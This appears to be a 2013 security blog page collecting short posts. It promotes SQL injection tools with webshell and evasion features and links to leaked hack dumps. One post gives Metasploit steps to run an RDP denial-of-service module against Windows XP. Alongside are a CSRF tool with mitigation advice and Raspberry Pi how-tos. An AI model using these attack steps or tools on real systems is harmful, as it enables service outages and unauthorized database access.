May 25, 2013

jSQL Injection - Java tool for automatic database injection



jSQL Injection is a lightweight application used to find database information from a distant server.

jSQL is free, open source and cross-platform (Windows, Linux, Mac OS X, Solaris).

Version 0.4 features:
  • GET, POST, header, cookie methods
  • Normal, error based, blind, time based algorithms
  • Automatic best algorithm selection
  • Multi-thread control (start/pause/resume/stop)
  • Progression bars
  • Shows URL calls
  • Simple evasion
  • Proxy setting
  • Distant file reading
  • Webshell deposit
  • Terminal for webshell commands
  • Configuration backup
  • Update checker
  • Admin page checker
  • Brute forcer (md5 mysql...)
  • Coder (encode decode base64 hex md5...)
  • Supports MySQL
Source: http://hack-tools.blackploit.com/2013/05/jsql-injection-v04-java-tool-for.html


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

May 23, 2013

Multiple information leak and twitter POST SQL Injection Vulnerability

Check this out.

CNN Hacked: http://pastebin.com/YQLv6t3E
Twitter POST SQL Injection Vulnerability: http://pastebin.com/itA0quXu
South African Police Service website was hacked: http://mybroadband.co.za/news/security/78516-saps-website-hacker-interviewed.html


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

SQL Poizon v1.1 – SQLi Exploit Scanner, Search Hunter, Injection Builder Tool

SQL Poizon v1.1 – SQLi Exploit Scanner, Search Hunter, Injection Builder Tool is a tool which scans website through dorks automatically and finds vulnerabilities in them its very easy powerful too, to find vulnerable site of any country

Source: http://www.rianul.com/blog/sql-poizon-v1-1-sqli-exploit-scanner-search-hunter-injection-builder-tool

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.





Howto: Optmizing Remote Desktop Connection

1. Start -> "Run"

2. Use "mstsc" -> "Show options"

3. Optimize what do you want

Source: http://www.maketecheasier.com/speeding-up-remote-desktop-connection/2013/05/22

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Howto: Use Alfa Network AWUS036H to your Raspbmc(Raspberry Pi)

I tried to use my wireless usb (AWUS036H) in my Raspbmc connect my wireless network but it's not work. I don't know why but when I see the log in console, it said that my password is incorrect. WTF!!!! I'm bloody sure about my password because other my devices can connect my wireless network with this password. I tried to update & upgrade my raspbmc but it's still not working. So I tried to install another program addon for resolve it. After try many program and addon, I used "Network-Manager" to resolve this problem.

1. Browse to your Program -> Addons

2. Install "Network Manager"

3. Connect your Alfa Network device

4. Delete old network config and add new network

5. When you click add, it will scan wireless network

6. When you click to your wireless network, insert your password

7. Wait for connect

8. In the bottom of Network-Manager, you will see the message "connected" :)

9. Done

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Howto: Play ISO on Raspbmc (Raspberry Pi)

1. Copy ISO to your drive

2. Mount it
mount -o loop /path/to/iso.file /path/to/mountpoint

3. Browse in your Video and play it.

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

May 20, 2013

Howto: EXPLOIT Remote Desktop Protocol(RDP) On Windows XP With Metasploit

1. Open msfconsole

2. use auxiliary/dos/windows/rdp/ms12_020_maxchannelids

3. Set RHOST and run

4. Have a nice DoS.

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

May 19, 2013

Tool: CSRF Tool



So, here is a short reminder about mitigation: 
Every state-changing (POST) request must contain a random token. Server-side must check it before processing the request using value stored in received cookies: cookies[:token] == params[:token]. If any POST endpoint lacks it — something is clearly wrong with implementation
For making world a better place I created a simple and handy CSRF Tool: homakov.github.io

  1. Copy as Curl from Web Inspector, paste into text field and get a working template in a few clicks:
  2. No hassle. Researchers need a playground to demonstrate CSRF, with CSRF Tool you can simply give a link with working template. 
  3. No disclosure. Fragment (part after #) is not sent on server side, so I am not able to track CSRFs you currently research (Github Pages don't have server side anyway). Link to template contains all information inside.
  4. Auto-submit for more fun, Base64 makes URL longer but hides the template.
  5. Add new fields and modify existing ones, change request method and endpoint path seamlessly. 
  6. Post into iframe (which is carefully sandboxed) or a new window, try Referrer-free submission and so on.
Source: http://homakov.blogspot.com/2013/05/csrf-tool.html


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Tool: DroidSQLi - The First MySQL InjectionTool On Android

DroidSQLi is the first automated MySQL Injection tool for Android. It allows you to test your MySQL-based web application against SQL injection attacks.

DroidSQLi supports the following injection techniques:
- Time based injection
- Blind injection
- Error based injection
- Normal injection
It automatically selects the best technique to use and employs some simple filter evasion methods.


Source: http://backtrack-page.blogspot.com/2013/05/droidsqli-first-automated-mysql.html


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.
 

Sponsors

lusovps.com

Blogroll

About

 Please subscribe my blog.

 Old Subscribe

Share |